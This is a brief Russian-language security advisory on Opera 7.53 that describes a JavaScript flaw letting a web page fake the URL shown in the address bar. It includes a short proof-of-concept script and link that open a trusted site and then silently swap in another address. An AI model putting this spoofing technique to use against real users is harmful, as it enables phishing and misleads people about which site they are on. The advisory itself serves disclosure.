Программа: Opera Web Browser 7.53, Build 3850
Уязвимость в Web браузере Opera в обработке javascript позволяет удаленному пользователю создать HTML, который подделает URL в адресной строке.
Удаленный пользователь может создать HTML, содержащий javascript, который, когда будет загружен, отобразить другой URL в адресной строке.
Пример:
[script]
function fake() {
oc=window.open('http://www.opera.com/', '','location=1');
oc.location.replace('http://www.example.com');
}
[/script]
[a href="javascript:void(0);" onClick="fake()"]http://www.opera.com/[/a]
